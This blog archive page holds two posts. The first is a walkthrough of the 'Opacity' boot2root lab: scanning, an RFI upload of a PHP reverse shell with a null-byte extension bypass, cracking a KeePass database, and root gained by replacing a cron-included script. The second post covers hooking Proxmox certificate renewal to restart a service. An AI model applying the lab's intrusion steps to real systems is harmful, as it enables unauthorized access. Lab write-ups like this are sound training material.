Month: October 2024

Opacity (Easy)

cormorantick Leave a comment

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

Enumeration

Nmap

nmap -sC -sV -oN nmap-inital.txt $IP
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-22T07:50:10
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

From this we note that there is a login page, that the server is running PHP,
and that there is an SMB server running.

Lets start Gobuster to see if we can find anything else in the web server.

Gobuster

gobuster dir -w /opt/directory-list-2.3-medium.txt --url $IP
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.21.236/css/]
/cloud                (Status: 301) [Size: 312] [--> http://10.10.21.236/cloud/]

Login page doesn’t reveal anything interesting. Neither does /css. SMBMAP also doesn’t reveal anything.

/cloud directory reveals a “5 Minute Upload” PHP application with an “External URL” field.
Some quick testing shows that it will allow for RFI. Expecting PHP rev-shell upload.

Exploit

RFI allows for uploads from attack machine. Uploads are stored in /cloud/images/ and are displayed immediately
after upload. Page appears to filter for image extensions.

/cloud/images/php-reverse-shell.php.jpg – uploads
/cloud/images/php-reverse-shell.php – fails to upload

PHP null bytes to circumvent extension.

/cloud/images/php-reverse-shell.php#00 .jpg – uploads and executes script successfully to get reverse shell as www-data.

Enumeration v2

LinPEAS

LinPEAS reports vulnerable to CVE-2021-3560, but I don’t think that’s the objective of this machine.

Further in the output I found dataset.kdbx in /opt/ which appears to be a KeePass database, which I
download to the attack machine. John has a tool to crack the hash.

keepass2john dataset.kdbx > dataset.hash
john --wordlist=/opt/rockyou.txt dataset.hash
741852963        (dataset)

Using kpcli I can open the database.

kpcli --kdb=dataset.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. user:password                                                          
kpcli:/Root> show 0

Title: user:password
Uname: sysadmin
 Pass: Cl0udP4ss40p4city#8700
  URL: 
Notes: 

kpcli:/Root> xp 0
Copied password for "user:password" to the clipboard.
sysadmin:Cl0udP4ss40p4city#8700

local.txt

We are now able to SSH into the box as the sysadmin user.

cat local.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PrivEsc

There is a script in the sysadmin home that is owned by root and executes a backup job and some deletions. It is not in our crontab, so I’m expecting it’s in root’s. It will be our obvious point of attack.
The script is not writable, but the lib directory is, and there is a backup.inc.php file that is included from that directory.
Simply uploading a reverse shell and moving it into the lib directory with the same name as backup.inc.php will overwrite it, even without write permissions on the file. Then start your listener and wait for the cron job to fire.

# cat proof.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Proxmox VE ACME/Certbot Hooks

cormorantick Leave a comment

LetsEncrypt certificates are an easy way to help secure your Proxmox VE installation. However, sometimes you want to use them for more. In my case, I had a local service that I also wanted to use the certificate for, but when the certificate renewed the service would not restart. ACME.sh has built-in hook functionality to solve this exact need, but unfortunately It’s not easily accessed if you also want all the features of the Proxmox GUI and certificate management, since Proxmox handles all the calling to ACME and doesn’t provide a method to hook.

Of course it would be possible to use ACME independently, and then restart the needed PVE services, but I like to tinker and I wanted to find a way to go the other way; How can I keep the PVE certificate management and also restart my local service after renewal.

After a ton of Googling, I finally managed to find a solution. Proxmox VE calls the /usr/bin/pveupdate script to update certificates. This is just a Perl script, and if you scroll down you’ll find a $renew subroutine, with the lines:

print "Restarting pveproxy after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'pveproxy']);

So I took those and added:

print "Restarting myservice after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'myservice']);

A certificate renewal via the GUI now restarts my service after a certificate renewal. This functionality could be used to hook any type of action you need. The only downside, is that this script needs to be updated each time Proxmox is updated. Not the most elegant solution, but it works.